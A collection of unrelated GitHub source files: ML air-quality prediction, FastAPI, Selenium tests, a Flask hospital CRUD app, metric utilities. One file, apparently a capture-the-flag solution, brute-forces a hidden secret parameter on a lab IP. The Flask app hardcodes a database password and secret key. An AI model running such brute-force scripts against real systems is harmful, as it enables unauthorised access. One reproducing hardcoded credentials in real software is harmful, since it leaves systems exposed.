data[['PM2.5','PM10','NO','NO2','NOx','NH3','CO','SO2','O3','Benzene','Toluene','AQI','AQI_Bucket']]\n\n print(data_a.isna().sum())\n\n #handing missing values\n data_a['PM2.5'] = data_a['PM2.5'].fillna(data_a['PM2.5'].median())\n data_a['PM10'] = data_a['PM10'].fillna(data_a['PM10'].median())\n data_a['NO'] = data_a['NO'].fillna(data_a['NO'].median())\n data_a['NO2'] = data_a['NO2'].fillna(data_a['NO2'].median())\n data_a['NOx'] = data_a['NOx'].fillna(data_a['NOx'].median())\n data_a['NH3'] = data_a['NH3'].fillna(data_a['NH3'].median())\n data_a['CO'] = data_a['CO'].fillna(data_a['CO'].median())\n data_a['SO2'] = data_a['SO2'].fillna(data_a['SO2'].median())\n data_a['O3'] = data_a['O3'].fillna(data_a['O3'].median())\n data_a['Benzene'] = data_a['Benzene'].fillna(data_a['Benzene'].median())\n data_a['Toluene'] = data_a['Toluene'].fillna(data_a['Toluene'].median())\n\n data_a['AQI_Bucket'].value_counts()\n\n data_a['AQI_Bucket'] = data_a['AQI_Bucket'].replace(['Moderate', 'Satisfactory'], 'Good')\n data_a['AQI_Bucket'] = data_a['AQI_Bucket'].replace(['Very Poor', 'Severe'], 'Poor')\n\n data_a['AQI_Bucket'] = data_a['AQI_Bucket'].replace(['Good'],1)\n data_a['AQI_Bucket'] = data_a['AQI_Bucket'].replace(['Poor'],0)\n\n X = data_a.iloc[:,:-1]\n y = data_a.iloc[:,-1]\n print(X)\n print(y)\n #train_test_splitting of data\n #from sklearn.model_selection import train_test_split\n X_train,X_test,y_train,y_test = train_test_split(X,y,test_size=0.25,random_state=100)\n\n #SVM training\n model1 = svm.SVC()\n model1.fit(X_train,y_train)\n svm_score=model1.score(X_test,y_test)\n print(svm_score)\n svm_predict = model1.predict(np.array(list).reshape(1,-1))\n print('svm_predict ---', svm_predict)\n if svm_predict== [1]:\n svm_p=\"1\"\n else :\n svm_p=\"0\"\n\n #KNN training\n neigh = KNeighborsClassifier(n_neighbors=3)\n neigh.fit(X_train, y_train)\n\n neigh_score=neigh.score(X_test,y_test)\n print(neigh_score)\n neigh_predict = neigh.predict(np.array(list).reshape(1,-1))\n print('neigh_predict ---', neigh_predict)\n if neigh_predict== [1]:\n neigh_p=\"1\"\n else:\n neigh_p=\"0\"\n #ANN training\n model2 = Sequential()\n model2.add(Dense(12, input_dim=12, activation='relu'))\n model2.add(Dropout(0.3))\n model2.add(Dense(8, activation='relu'))\n model2.add(Dense(1, activation='sigmoid'))\n model2.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])\n\n model2.fit(X, y, epochs=1, batch_size=10)\n\n print('X_test.iloc[10] ', np.array(X_test.iloc[10]).reshape(1,-1))\n #print('X_test.iloc[10] X_test ', X_test)\n #ann_predict = model2.predict(X_test)\n \n print('list ---', np.array(list).reshape(1,-1))\n ann_predict_accuracy = model2.predict(np.array(list).reshape(1,-1))\n print('ann_predict_accuracy ---', ann_predict_accuracy[0][0])\n print(\"new==\",svm_p)\n print(\"nei==\",neigh_p)\n\n return ann_predict_accuracy[0][0]*100, svm_score*100, neigh_score*100,svm_p,neigh_p\n\n'''\ndef output_results(list):\n list_of_outputs = []\n list_of_outputs.append(model1.predict(np.array(list).reshape(1,-1))\n list_of_outputs.append(neigh.predict(np.array(list).reshape(1,-1))\n list_of_outputs.append(model2.predict(np.array(list).reshape(1,-1))\n print(list_of_outputs)\n return list_of_outputs\n\n'''\n\n\ndef predict_aqi(list):\n # loading dataset and storing in train variable\n dir_path = os.path.dirname(os.path.realpath(__file__))\n print('dir_path --- ', dir_path)\n data = pd.read_csv(dir_path + \"/city_day.csv\")\n\n data = data.dropna(subset=['AQI_Bucket'])\n\n data_a = data[['PM2.5', 'PM10', 'NO2', 'NH3', 'SO2', 'CO', 'O3', 'AQI']]\n\n print(data_a.isna().sum())\n\n # handing missing values\n data_a['PM2.5'] = data_a['PM2.5'].fillna(data_a['PM2.5'].median())\n data_a['PM10'] = data_a['PM10'].fillna(data_a['PM10'].median())\n data_a['NO2'] = data_a['NO2'].fillna(data_a['NO2'].median())\n data_a['NH3'] = data_a['NH3'].fillna(data_a['NH3'].median())\n data_a['SO2'] = data_a['SO2'].fillna(data_a['SO2'].median())\n data_a['CO'] = data_a['CO'].fillna(data_a['CO'].median())\n data_a['O3'] = data_a['O3'].fillna(data_a['O3'].median())\n data_a['AQI'] = data_a['AQI'].fillna(data_a['AQI'].median())\n\n train = data_a\n\n # display top 5 data\n train.head()\n\n # creating model\n m1 = RandomForestRegressor()\n\n # separating class label and other attributes\n train1 = train.drop(['AQI'], axis=1)\n target = train['AQI']\n\n # Fitting the model\n m1.fit(train1, target)\n '''RandomForestRegressor(bootstrap=True, ccp_alpha=0.0, criterion='mse',\n max_depth=None, max_features='auto', max_leaf_nodes=None,\n max_samples=None, min_impurity_decrease=0.0,\n min_impurity_split=None, min_samples_leaf=1,\n min_samples_split=2, min_weight_fraction_leaf=0.0,\n n_estimators=100, n_jobs=None, oob_score=False,\n random_state=None, verbose=0, warm_start=False)'''\n\n # calculating the score and the score is 97.96360799890066%\n m1.score(train1, target) * 100\n\n # predicting the model with other values (testing the data)\n # so AQI is 123.71\n m1.predict([[123, 45, 67, 34, 5, 0, 23]])\n random_forest_aqi = m1.predict(np.array(list).reshape(1, -1))\n print('random_forest_aqi --- ', random_forest_aqi)\n\n '''\n # Adaboost model\n # importing module\n\n # defining model\n m2 = AdaBoostRegressor()\n\n # Fitting the model\n m2.fit(train1, target)\n\n #AdaBoostRegressor(base_estimator=None, learning_rate=1.0, loss='linear', n_estimators=50, random_state=None)\n\n # calculating the score and the score is 96.15377360010211%\n m2.score(train1, target)*100\n\n # predicting the model with other values (testing the data)\n # so AQI is 94.42105263\n ada_aqi = m2.predict(np.array(list).reshape(1,-1))\n print('ada_aqi --- ', ada_aqi)\n '''\n\n return random_forest_aqi\n\n'''\nif __name__ == \"__main__\":\n list = [123, 45, 67, 34, 5, 0, 23]\n\n predict_aqi(list)\n'''","repo_name":"perry4455git/aqi_ml_project","sub_path":"air_app/WeatherPrediction.py","file_name":"WeatherPrediction.py","file_ext":"py","file_size_in_byte":6882,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"42"} +{"seq_id":"72949315647","text":"import uvicorn\nfrom fastapi import FastAPI\n\nfrom src.core import config\nfrom src.api.base import router\n\napp = FastAPI(\n title=config.PROJECT_NAME,\n docs_url='/api/openapi',\n openapi_url='/api/openapi.json'\n)\n\napp.include_router(router, prefix='/api')\n\nif __name__ == '__main__':\n uvicorn.run(\n 'main:app',\n host=config.PROJECT_HOST,\n port=config.PROJECT_PORT,\n )\n","repo_name":"BazNick/deposit_calculation","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"27994465177","text":"#!/usr/bin/env python3\n\nimport requests\nimport sys\n\n\nurl = 'http://10.10.170.159/th1s_1s_h1dd3n/?secret='\n\nfor i in range(100):\n r = requests.get(url = url + str(i))\n data = r.text\n\n if 'wrong!' in data:\n print(f\"Secret {i} is wrong\", end=\"\\r\")\n else:\n print(f\"Secret {i} is right!\")\n print(r.text)\n break\n","repo_name":"TimDOtt/thm","sub_path":"madness/ape.py","file_name":"ape.py","file_ext":"py","file_size_in_byte":346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"712522876","text":"import unittest\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nimport time\nimport xml.etree.ElementTree as ET\n\nclass ProductCatalogTest(unittest.TestCase):\n\n def setUp(self):\n self.driver = webdriver.Chrome()\n self.driver.implicitly_wait(10)\n\n # def tearDown(self):\n # self.driver.quit()\n\n def test_product_search(self):\n product_data = self.retrieve_product_data('../xml/product_data.xml', 'product_search')\n\n # Navigate to the home page\n self.driver.get(\"http://demowebshop.tricentis.com\")\n time.sleep(2)\n\n # Search for a product\n search_input = self.driver.find_element(By.ID, \"small-searchterms\")\n search_input.send_keys(product_data['search_term'])\n time.sleep(1)\n\n search_button = self.driver.find_element(By.CSS_SELECTOR, '[type=\"submit\"][value=\"Search\"]')\n search_button.click()\n time.sleep(2)\n\n # Verify search results\n product_list = self.driver.find_elements(By.CSS_SELECTOR, \".product-item .product-title\")\n self.assertTrue(len(product_list) > 0)\n\n # Select a product\n product_link = product_list[0].find_element(By.TAG_NAME, \"a\")\n product_link.click()\n time.sleep(2)\n\n # Verify product details page\n \n\n def test_product_category_navigation(self):\n category_data = self.retrieve_product_data('../xml/product_data.xml', 'product_category')\n\n # Navigate to the home page\n self.driver.get(\"http://demowebshop.tricentis.com\")\n time.sleep(2)\n\n # Navigate to a product category\n category_link = self.driver.find_element(By.LINK_TEXT, category_data['category'])\n category_link.click()\n time.sleep(2)\n\n\n # Select a product from the category\n product_list = self.driver.find_elements(By.CSS_SELECTOR, \".product-item .product-title\")\n self.assertTrue(len(product_list) > 0)\n\n product_link = product_list[0].find_element(By.TAG_NAME, \"a\")\n product_link.click()\n time.sleep(2)\n\n # Verify product details page\n \n\n def retrieve_product_data(self, xml_file, test_type):\n tree = ET.parse(xml_file)\n root = tree.getroot()\n\n data = {}\n for item in root.findall(test_type):\n for element in item:\n data[element.tag] = element.text\n\n return data\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"SolomonBekele/automation_test","sub_path":"selenium/test/programs/product_catalog.py","file_name":"product_catalog.py","file_ext":"py","file_size_in_byte":2462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"944793578","text":"import tcod\nimport json\n\nfrom enum import Enum\n\nfrom components.equippable import Equippable\nfrom entity import Entity\n\nfrom equipment_slots import EquipmentSlots\n\n\n# class WeaponTypes(Enum):\n# DAGGER = 1\n# WARHAMMER = 2\n# SHORT_SWORD = 3\n# LONG_SWORD = 4\n\n\n# class ArmorTypes(Enum):\n# SMALL_SHIELD = 1\n\n\ndef create_weapon(weapon_type, x, y):\n\n # load all equipment data\n with open('data_files/equipment.json') as f:\n equipment = json.load(f)\n\n dagger = equipment['dagger'] \n warhammer = equipment['warhammer']\n short_sword = equipment['short_sword']\n long_sword = equipment['long_sword']\n\n\n if weapon_type == 'dagger':\n slot = getattr(EquipmentSlots, dagger['slot'])\n damage_dice = dagger['damage_dice']\n char = dagger['char']\n color = getattr(tcod, dagger['color'])\n name = dagger['name']\n\n elif weapon_type == 'warhammer':\n slot = getattr(EquipmentSlots, warhammer['slot'])\n damage_dice = warhammer['damage_dice']\n char = warhammer['char']\n color = getattr(tcod, warhammer['color'])\n name = warhammer['name']\n\n elif weapon_type == 'short_sword':\n slot = getattr(EquipmentSlots, short_sword['slot'])\n damage_dice = short_sword['damage_dice']\n char = short_sword['char']\n color = getattr(tcod, short_sword['color'])\n name = short_sword['name']\n\n elif weapon_type == 'long_sword':\n slot = getattr(EquipmentSlots, long_sword['slot'])\n damage_dice = long_sword['damage_dice']\n char = long_sword['char']\n color = getattr(tcod, long_sword['color'])\n name = long_sword['name']\n\n equippable_component = Equippable(\n slot,\n damage_dice=damage_dice\n )\n\n weapon = Entity(\n x, \n y, \n char, \n color, \n name,\n equippable=equippable_component\n )\n\n return weapon","repo_name":"eirinnmorgian/rl-tutorial-extensions","sub_path":"create_equipment.py","file_name":"create_equipment.py","file_ext":"py","file_size_in_byte":1917,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"27416529473","text":"import sys\n\ninput = sys.stdin.readline\n\nn, m = map(int, input().strip().split())\n\ndict_m = {}\ndict_r = {}\nfor i in range(1, n+1):\n name = input().strip()\n\n dict_m[name] = i\n dict_r[i] = name\n\nfor j in range(m):\n name = input().strip()\n\n if name.isdigit():\n print(dict_r[int(name)])\n else:\n print(dict_m[name])","repo_name":"Ssuwani/algorithm-study","sub_path":"DataStructure2/1620_나는야포켓몬마스터이다솜.py","file_name":"1620_나는야포켓몬마스터이다솜.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"13285550554","text":"from typing import Collection, List, Tuple\n\nfrom rexmex.metrics.classification import classifications\nfrom rexmex.metrics.coverage import item_coverage, user_coverage\nfrom rexmex.metrics.rating import (\n mean_absolute_error,\n mean_absolute_percentage_error,\n mean_squared_error,\n pearson_correlation_coefficient,\n r2_score,\n root_mean_squared_error,\n symmetric_mean_absolute_percentage_error,\n)\nfrom rexmex.utils import binarize, normalize\n\n\nclass MetricSet(dict):\n \"\"\"\n A metric set is a special dictionary that contains metric\n name keys and evaluation metric function values.\n \"\"\"\n\n def filter_metrics(self, filter: Collection[str]):\n \"\"\"\n A method to keep a list of metrics.\n\n Args:\n filter: A list of metric names to keep.\n Returns:\n self: The metric set after the metrics were filtered out.\n \"\"\"\n for name in list(self.keys()):\n if name not in filter:\n del self[name]\n return self\n\n def add_metrics(self, metrics: List[Tuple]):\n \"\"\"\n A method to add metric functions from a list of function names and functions.\n\n Args:\n metrics (List[Tuple]): A list of metric name and metric function tuples.\n Returns:\n self: The metric set after the metrics were added.\n \"\"\"\n for metric in metrics:\n metric_name, metric_function = metric\n self[metric_name] = metric_function\n return self\n\n def __repr__(self):\n \"\"\"\n A representation of the MetricSet object.\n \"\"\"\n return \"MetricSet()\"\n\n def print_metrics(self):\n \"\"\"\n Printing the name of metrics.\n \"\"\"\n print({k for k in self.keys()})\n\n def __add__(self, other_metric_set):\n \"\"\"\n Adding two metric sets together with the addition syntactic sugar operator.\n\n Args:\n other_metric_set (rexmex.metricset.MetricSet): Metric set added from the right.\n Returns:\n new_metric_set (rexmex.metricset.MetricSet): The combined metric set.\n \"\"\"\n new_metric_set = self\n for name, metric in other_metric_set.items():\n new_metric_set[name] = metric\n return new_metric_set\n\n\nclass ClassificationMetricSet(MetricSet):\n \"\"\"\n A set of classification metrics with the following metrics included:\n\n | **Area Under the Receiver Operating Characteristic Curve**\n | **Area Under the Precision Recall Curve**\n | **Average Precision**\n | **F-1 Score**\n | **Matthew's Correlation Coefficient**\n | **Fowlkes-Mallows Index**\n | **Precision**\n | **Recall**\n | **Specificity**\n | **Accuracy**\n | **Balanced Accuracy**\n \"\"\"\n\n def __init__(self):\n super().__init__()\n for func in classifications:\n name = func.__name__\n if name.endswith(\"_score\"):\n name = name[: -len(\"_score\")]\n if func.binarize:\n func = binarize(func)\n self[name] = func\n\n def __repr__(self):\n \"\"\"\n A representation of the ClassificationMetricSet object.\n \"\"\"\n return \"ClassificationMetricSet()\"\n\n\nclass RatingMetricSet(MetricSet):\n \"\"\"\n A set of rating metrics with the following metrics included:\n\n | **Mean Absolute Error**\n | **Mean Squared Error**\n | **Root Mean Squared Error**\n | **Mean Absolute Percentage Error**\n | **Symmetric Mean Absolute Percentage Error**\n | **Coefficient of Determination**\n | **Pearson Correlation Coefficient**\n \"\"\"\n\n def __init__(self):\n self[\"mae\"] = mean_absolute_error\n self[\"mse\"] = mean_squared_error\n self[\"rmse\"] = root_mean_squared_error\n self[\"mape\"] = mean_absolute_percentage_error\n self[\"smape\"] = symmetric_mean_absolute_percentage_error\n self[\"r_squared\"] = r2_score\n self[\"pearson_correlation\"] = pearson_correlation_coefficient\n\n def normalize_metrics(self):\n \"\"\"\n A method to normalize a set of metrics.\n\n Returns:\n self: The metric set after the metrics were normalized.\n \"\"\"\n for name, metric in self.items():\n self[name] = normalize(metric)\n return self\n\n def __repr__(self):\n \"\"\"\n A representation of the RatingMetricSet object.\n \"\"\"\n return \"RatingMetricSet()\"\n\n\nclass CoverageMetricSet(MetricSet):\n \"\"\"\n A set of coverage metrics with the following metrics included:\n | **Item Coverage**\n | **User Coverage**\n \"\"\"\n\n def __init__(self):\n self[\"item_coverage\"] = item_coverage\n self[\"user_coverage\"] = user_coverage\n\n def __repr__(self):\n \"\"\"\n A representation of the CoverageMetricSet object.\n \"\"\"\n return \"CoverageMetricSet()\"\n\n\nclass RankingMetricSet(MetricSet):\n \"\"\"\n A set of ranking metrics with the following metrics included:\n\n \"\"\"\n\n def __repr__(self):\n \"\"\"\n A representation of the RankingMetricSet object.\n \"\"\"\n return \"RankingMetricSet()\"\n","repo_name":"AstraZeneca/rexmex","sub_path":"rexmex/metricset.py","file_name":"metricset.py","file_ext":"py","file_size_in_byte":5115,"program_lang":"python","lang":"en","doc_type":"code","stars":271,"dataset":"github-code","pt":"42"} +{"seq_id":"10301398974","text":"# factorial\ndef factorial(x):\n if x == 1:\n return 1\n else:\n return x * factorial(x - 1)\n\n\n# #\n# # print(factorial(10))\n#\n# # generator\n#\n# def gen_factorail(x):\n# for i in range(x,0,-1):\n# yield i\n# #\n# # for i in range(10):\n# # print(next(gen))\n#\n# s = 'hellp world'\n# gen = gen_factorail(len(s))\n#\n# for i in range(len(s)):\n# print(s[next(gen)-1])\n\n\nprint(factorial(100))","repo_name":"echosori/Algorithm","sub_path":"Grokking Algorithms/3.递归.py","file_name":"3.递归.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"32427275824","text":"from flask import Flask, render_template,request,redirect,url_for,flash\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_migrate import Migrate\n\napp = Flask(__name__)\napp.secret_key = \"Nivetha\"\napp.config['SQLALCHEMY_DATABASE_URI'] = \"postgresql://postgres:1234@localhost:5432/postgres\"\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS']= True\ndb = SQLAlchemy(app)\n# migrate = Migrate(app, db)\ndb.init_app(app)\n\nclass patient(db.Model):\n id = db.Column(db.Integer, primary_key = True)\n name = db.Column(db.String(100))\n phone = db.Column(db.String(100))\n disease = db.Column(db.String(100))\n status = db.Column(db.String(100))\n\n def __init__(self,name,phone,disease,status):\n self.name = name\n self.phone = phone\n self.disease = disease\n self.status = status\n\n@app.before_first_request\ndef create_all():\n db.create_all()\n\n@app.route('/')\ndef Index():\n\tall_data = patient.query.all()\n\tall_dat = doctor.query.all()\n\tall_da = employee.query.all()\n\tdata = {'patients':all_data,'doctor':all_dat,'employees':all_da}\n\treturn render_template('index.html',**data)\n\n\n@app.route('/insert', methods = ['POST'])\ndef insert():\n if request.method == 'POST':\n name = request.form['name']\n phone = request.form['phone']\n disease = request.form['disease']\n status = request.form['status']\n\n my_data = patient(name,phone,disease,status)\n db.session.add(my_data)\n db.session.commit()\n\n flash(\"Patient Inserted Successfully!!\")\n\n return redirect(url_for('Index'))\n\n\n@app.route('/update', methods = ['GET','POST'])\ndef update():\n if request.method == 'POST':\n my_data = patient.query.get(request.form.get('id'))\n \n my_data.name = request.form['name']\n my_data.phone = request.form['phone']\n my_data.disease = request.form['disease']\n my_data.status = request.form['status']\n \n db.session.commit()\n flash(\"Patient Updated Successfully\")\n \n return redirect(url_for('Index'))\n\n@app.route('/delete//', methods = ['GET', 'POST'])\ndef delete(id):\n my_data = patient.query.get(id)\n db.session.delete(my_data)\n db.session.commit()\n flash(\"Patient Deleted Successfully\")\n \n return redirect(url_for('Index'))\n \nclass doctor(db.Model):\n id = db.Column(db.Integer, primary_key = True)\n name = db.Column(db.String(100))\n phone = db.Column(db.String(100))\n specialist = db.Column(db.String(100))\n\n def __init__(self,name,phone,specialist):\n self.name = name\n self.phone = phone\n self.specialist = specialist\n\n\n@app.route('/insert1', methods = ['POST'])\ndef insert1():\n if request.method == 'POST':\n name = request.form['name']\n phone = request.form['phone']\n specialist = request.form['specialist']\n\n my_data = doctor(name,phone,specialist)\n db.session.add(my_data)\n db.session.commit()\n\n flash(\"Doctor Inserted Successfully!!\")\n\n return redirect(url_for('Index'))\n\n\n@app.route('/update1', methods = ['GET','POST'])\ndef update1():\n if request.method == 'POST':\n my_data = doctor.query.get(request.form.get('id'))\n \n my_data.name = request.form['name']\n my_data.phone = request.form['phone']\n my_data.specialist = request.form['specialist']\n \n db.session.commit()\n flash(\"Doctor Updated Successfully\")\n \n return redirect(url_for('Index'))\n\n@app.route('/delete1//', methods = ['GET', 'POST'])\ndef delete1(id):\n my_data = doctor.query.get(id)\n db.session.delete(my_data)\n db.session.commit()\n flash(\"Doctor Deleted Successfully\")\n \n return redirect(url_for('Index'))\n\n\nclass employee(db.Model):\n id = db.Column(db.Integer, primary_key = True)\n name = db.Column(db.String(100))\n phone = db.Column(db.String(100))\n designation = db.Column(db.String(100))\n\n def __init__(self,name,phone,designation):\n self.name = name\n self.phone = phone\n self.designation = designation\n\n\n@app.route('/insert2', methods = ['POST'])\ndef insert2():\n if request.method == 'POST':\n name = request.form['name']\n phone = request.form['phone']\n designation = request.form['designation']\n\n my_data = employee(name,phone,designation)\n db.session.add(my_data)\n db.session.commit()\n\n flash(\"Employee Inserted Successfully!!\")\n\n return redirect(url_for('Index'))\n\n\n@app.route('/update2', methods = ['GET','POST'])\ndef update2():\n if request.method == 'POST':\n my_data = employee.query.get(request.form.get('id'))\n \n my_data.name = request.form['name']\n my_data.phone = request.form['phone']\n my_data.designation = request.form['designation']\n \n db.session.commit()\n flash(\"Employee Updated Successfully\")\n \n return redirect(url_for('Index'))\n\n@app.route('/delete2//', methods = ['GET', 'POST'])\ndef delete2(id):\n my_data = employee.query.get(id)\n db.session.delete(my_data)\n db.session.commit()\n flash(\"Employee Deleted Successfully\")\n \n return redirect(url_for('Index'))\n\nif __name__ == \"__main__\":\n\tapp.run(debug=True)\n","repo_name":"Nivethithaa-M/Hospital-Management-CRUD-App-in-Flask","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5173,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"71217850047","text":"import dutils.type_check as _type_check\nimport dutils.jupyter_ipython as _jupyter_ipython\nimport torch\nimport torch as _torch\nimport numpy as _np\nfrom typing import List as _List\nimport pandas as _pd\nfrom datetime import datetime as _datetime\nimport ast as _ast\n\n\nclass CategoricalMetrics:\n \"\"\"\n This is basically just a namespace with different functions designed to evaluate metrics e.g. accuracy.\n\n INPUTS:\n nc: int --> number of classes\n preds: _torch.Tensor[int64 * nc] --> contain predictions. All values must be within [0, 1, ..., nc-1]\n gt: _torch.Tensor[int64 * nc] --> contain ground truth labels. All values must be within [0, 1, ..., nc-1]\n cfm: _np.ndarray[[int32 * nc] * nc] or None --> Confusion matrix between `gt` (rows) and `preds` (columns). If `cfm=None`, the confusion matrix will be calculated automatically\n\n NOTE:\n I would like to have all pytorch functionality in a single file, but would also like to be able to browse different metrcis with autocomplete.\n Hence, why I made this into a class instead of ordinary functions / a seperate module.\n \"\"\"\n\n def __init__(self):\n self.num_decimal = 5\n\n def _check_and_copy_input(self, preds: _torch.Tensor, gt: _torch.Tensor, nc: int, cfm: _np.ndarray = None):\n # Type checks\n _type_check.assert_types([preds, gt, nc, cfm], [_torch.Tensor, _torch.Tensor, int, _np.ndarray],\n [False, False, False, True])\n assert preds.dtype == _torch.int64, f\"Expected predictions to be af int64 (long), but recieved `preds.dtype={preds.dtype}`\"\n assert gt.dtype == _torch.int64, f\"Expected ground truth labels to be af int64 (long), but recieved `preds.dtype={gt.dtype}`\"\n\n # Value checks\n assert nc > 1, f\"Expected at least 2 classes, but received `{nc}`\"\n assert len(preds.shape) == 1, f\"Expected predictions to be of shape 'batch_size', but received `preds.shape={preds.shape}`\"\n assert len(gt.shape) == 1, f\"Expected ground truth labels to be of shape 'batch_size', but received `gt.shape={gt.shape}`\"\n assert gt.shape == preds.shape, \"Shape mismatch between the ground truth labels and the received predictions\"\n assert (gt.max() < nc) and (gt.min() >= 0), \"At least one of the ground truth values are invalid\"\n assert (preds.max() < nc) and (preds.min() >= 0), \"At least one prediction values are is invalid\"\n\n # Confusion matrix\n if cfm is not None:\n assert cfm.shape == (nc, nc), f\"Expected the confusion matrix to be of shape `({nc, nc})`, but received `({cfm.shape})`\"\n assert cfm.dtype == _np.int32, f\"Expected cfm to have dtype int32, but received `cfm.dtype={cfm.dtype}`\"\n cfm = cfm.copy()\n\n # Prepare tensors for metric calculations\n preds = preds.clone().detach().cpu().float()\n gt = gt.clone().detach().cpu().float()\n return preds, gt, cfm\n\n def acc(self, preds: _torch.Tensor, gt: _torch.Tensor, nc: int):\n preds, gt, _ = self._check_and_copy_input(preds, gt, nc, None)\n if nc != 2: raise NotImplementedError(\"Multiclass accuracy is not well defined, use recall instead.\")\n\n acc = (preds == gt).float().mean().item() # TODO: check implementation is correct\n return acc\n\n def precision(self, preds: _torch.Tensor, gt: _torch.Tensor, nc: int, cfm: _np.ndarray = None):\n # Setup\n if cfm is None: cfm = self.confusion_matrix(preds, gt, nc)\n preds, gt, cfm = self._check_and_copy_input(preds, gt, nc, cfm)\n\n # Precision calculation\n TP = cfm.diagonal()\n TP_plus_FP = cfm.sum(0)\n precision_per_class = TP / (TP_plus_FP + 1e-12)\n precision_per_class = precision_per_class.round(self.num_decimal)\n\n return {\"precision_class\": precision_per_class.tolist(),\n \"precision_avg_micro\": round(TP.sum() / TP_plus_FP.sum(), self.num_decimal),\n \"precision_avg_macro\": round(precision_per_class.mean(), self.num_decimal)}\n\n def recall(self, preds: _torch.Tensor, gt: _torch.Tensor, nc: int, cfm: _np.ndarray = None):\n # Setup\n if cfm is None: cfm = self.confusion_matrix(preds, gt, nc)\n preds, gt, cfm = self._check_and_copy_input(preds, gt, nc, cfm)\n\n # Recall calculation\n TP = cfm.diagonal()\n TP_plus_FN = cfm.sum(1)\n recall_per_class = TP / (TP_plus_FN + 1e-12)\n recall_per_class = recall_per_class.round(self.num_decimal)\n\n return {\"recall_class\": recall_per_class.tolist(),\n \"recall_avg_micro\": round(TP.sum() / TP_plus_FN.sum(), self.num_decimal),\n \"recall_avg_macro\": round(recall_per_class.mean(), self.num_decimal)}\n\n def f1_score(self, preds: _torch.Tensor, gt: _torch.Tensor, nc: int, cfm: _np.ndarray = None):\n # Setup\n if cfm is None: cfm = self.confusion_matrix(preds, gt, nc)\n preds, gt, cfm = self._check_and_copy_input(preds, gt, nc, cfm)\n\n # F1 score calculation (macro)\n precision = _np.array(self.precision(preds.long(), gt.long(), nc, cfm)[\"precision_class\"])\n recall = _np.array(self.recall(preds.long(), gt.long(), nc, cfm)[\"recall_class\"])\n f1_per_class = (2 * precision * recall) / (precision + recall + 1e-12)\n f1_per_class = f1_per_class.round(self.num_decimal)\n\n # F1 score calculation (micro)\n # So to make a long story short \"f1=precision=recall\" is true in multiclass setups with micro averging.\n # The reason for this is essentailly that FP=FN ==> precision = recall.\n # This was kinda wierd to me at first, but in a multiclass setup all the elements in a conf. matrix is both FP and FN simulationously i.e. a wrong prediction in one class will always be missing in another\n # So I have just calculated the precision ones to avoid unnecessary computations\n TP = cfm.diagonal().sum()\n FP = cfm.sum(0).sum() - TP # == cfm.sum(1).sum() - TP\n f1_avg_micro = round((TP / (TP + FP)).mean(), self.num_decimal)\n\n return {\"f1_class\": f1_per_class.tolist(),\n \"f1_avg_micro\": round(f1_avg_micro, self.num_decimal),\n \"f1_avg_macro\": round(f1_per_class.mean(), self.num_decimal)}\n\n def class_balance(self, preds: _torch.Tensor, gt: _torch.Tensor, nc: int, label_names: _List[str],\n plot_class_dist: bool = False):\n # _np.unique(labels.numpy(), return_counts=True)\n # plot_class_dist\n # translate numbers to names\n raise NotImplementedError(\"\")\n\n def confusion_matrix(self, preds: _torch.Tensor, gt: _torch.Tensor, nc: int):\n preds, gt, _ = self._check_and_copy_input(preds, gt, nc, None)\n cfm = _np.zeros((nc, nc))\n for p, l in zip(preds.long(), gt.long()):\n cfm[l, p] += 1\n return cfm.astype(int)\n\n\npytorch_metrics = CategoricalMetrics()\n\n\nclass CategoricalLogger:\n \"\"\"\n\n\n # EXAMPLE (1)\n >> logger = CategoricalLogger(1000, 3)\n >> for epoch in range(5):\n >> logger.update(epoch, _torch.randint(0, 3, (10000,)).long(), _torch.randint(0, 3, (10000,)).long())\n >> print(logger)\n >> logger.get_overall_average()\n \n \n # EXAMPLE (2)\n >> logger = CategoricalLogger(10, 3)\n >> for epoch in range(5):\n >> logger.update(epoch, _torch.randint(0, 3, (100,)).long(), _torch.randint(0, 3, (100,)).long(),\n >> _torch.rand(1)[0], _torch.rand(1)[0])\n >> print(logger)\n >> logger.get_overall_average()\n\n >> predictions = _torch.tensor([0, 0, 2, 1, 0, 2, 1, 0, 2, 0, 2, 2]).long()\n >> labels = _torch.tensor([2, 0, 2, 2, 0, 1, 1, 2, 2, 0, 1, 2]).long()\n\n >> print(\" \", predictions, \"\\n \", labels)\n >> C = CategoricalMetrics()\n >> print(C.confusion_matrix(predictions, labels, 3))\n >> print(C.precision(predictions, labels, 3))\n >> print(C.recall(predictions, labels, 3))\n >> print(C.f1_score(predictions, labels, 3))\n \"\"\"\n\n\n\n\n def __init__(self, batch_size: int, num_classes: int, epochs_trained_prior: int = 0, acc: bool = False,\n precision: bool = True, recall: bool = True, f1: bool = True, confusion_matrix: bool = True):\n if acc and not (num_classes != 2):\n raise ValueError(\"Accuracy is only defined for binary classification tasks\")\n self.num_classes = num_classes\n self.batch_size = batch_size\n self.epochs_trained_prior = epochs_trained_prior\n\n # Prepare metrics\n extra_cols = []\n self.metrics = []\n if acc:\n extra_cols += [\"acc\"]\n self.metrics.append(\"acc\")\n if precision:\n extra_cols += ['precision_class', 'precision_avg_micro', 'precision_avg_macro']\n self.metrics.append(\"precision\")\n if recall:\n extra_cols += ['recall_class', 'recall_avg_micro', 'recall_avg_macro']\n self.metrics.append(\"recall\")\n if f1:\n extra_cols += ['f1_class', 'f1_avg_micro', 'f1_avg_macro']\n 